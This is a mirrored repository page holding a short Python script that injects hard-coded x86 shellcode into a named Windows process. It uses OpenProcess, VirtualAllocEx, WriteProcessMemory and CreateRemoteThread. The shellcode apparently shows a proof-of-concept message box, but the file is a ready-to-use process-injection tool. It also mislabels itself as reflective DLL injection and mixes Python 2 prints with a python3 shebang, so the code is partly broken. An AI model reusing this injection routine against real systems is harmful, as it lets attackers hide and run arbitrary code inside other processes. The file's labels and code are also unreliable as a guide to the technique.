mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2024-12-21 21:45:16 -05:00
1157e1bade
An example example of reflective DLL injection
66 lines
2.7 KiB
Python
66 lines
2.7 KiB
Python
#!/usr/bin/env python3
|
|
# An example example of reflective DLL injection
|
|
|
|
import sys
|
|
from ctypes import *
|
|
from win32com.client import GetObject
|
|
|
|
if len(sys.argv) < 2:
|
|
print "Python code injector: ./" + sys.argv[0] + " <process to inject>"
|
|
sys.exit(0)
|
|
|
|
proc = sys.argv[1]
|
|
WMI = GetObject('winmgmts:')
|
|
p = WMI.ExecQuery('select * from Win32_Process where Name="%s"' %(proc))
|
|
if len(p) == 0:
|
|
print "Process " + proc + " not found, exiting!"
|
|
sys.exit(0)
|
|
|
|
process_id = p[0].Properties_('ProcessId').Value
|
|
|
|
shellcode = \
|
|
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" \
|
|
"\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" \
|
|
"\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" \
|
|
"\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" \
|
|
"\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01" \
|
|
"\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d" \
|
|
"\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01" \
|
|
"\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" \
|
|
"\xe8\x89\x44\x24\x1c\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89" \
|
|
"\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45" \
|
|
"\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff" \
|
|
"\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64" \
|
|
"\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56" \
|
|
"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24" \
|
|
"\x52\xe8\x5f\xff\xff\xff\x68\x58\x20\x20\x20\x68\x20\x50" \
|
|
"\x4f\x43\x68\x63\x74\x6f\x72\x68\x49\x6e\x6a\x65\x68\x6f" \
|
|
"\x64\x65\x20\x68\x6f\x6e\x20\x43\x68\x50\x79\x74\x68\x31" \
|
|
"\xdb\x88\x5c\x24\x18\x89\xe3\x68\x72\x67\x58\x20\x68\x6e" \
|
|
"\x61\x2e\x6f\x68\x6f\x72\x74\x75\x68\x72\x65\x61\x66\x68" \
|
|
"\x2e\x61\x6e\x64\x68\x2f\x77\x77\x77\x68\x70\x73\x3a\x2f" \
|
|
"\x68\x20\x68\x74\x74\x68\x72\x67\x20\x2d\x68\x6e\x61\x2e" \
|
|
"\x6f\x68\x6f\x72\x74\x75\x68\x72\x65\x61\x66\x68\x40\x61" \
|
|
"\x6e\x64\x68\x64\x72\x65\x61\x68\x2d\x20\x61\x6e\x68\x75" \
|
|
"\x6e\x61\x20\x68\x46\x6f\x72\x74\x68\x72\x65\x61\x20\x68" \
|
|
"\x20\x41\x6e\x64\x68\x64\x20\x62\x79\x68\x6c\x6f\x70\x65" \
|
|
"\x68\x64\x65\x76\x65\x68\x64\x6c\x79\x20\x68\x50\x72\x6f" \
|
|
"\x75\x31\xc9\x88\x4c\x24\x5e\x89\xe1\x31\xd2\x52\x53\x51" \
|
|
"\x52\xff\xd0\x31\xc0\x50\xff\x55\x08"
|
|
|
|
|
|
process_handle = windll.kernel32.OpenProcess(0x1F0FFF, False, process_id)
|
|
|
|
if not process_handle:
|
|
print "Couldn't acquire a handle to PID: %s" % process_id
|
|
sys.exit(0)
|
|
|
|
memory_allocation_variable = windll.kernel32.VirtualAllocEx(process_handle, 0, len(shellcode), 0x00001000, 0x40)
|
|
windll.kernel32.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, len(shellcode), 0)
|
|
|
|
if not windll.kernel32.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, 0, 0, 0):
|
|
print "Failed to inject shellcode. Exiting."
|
|
sys.exit(0)
|
|
|
|
print "Remote thread created!"
|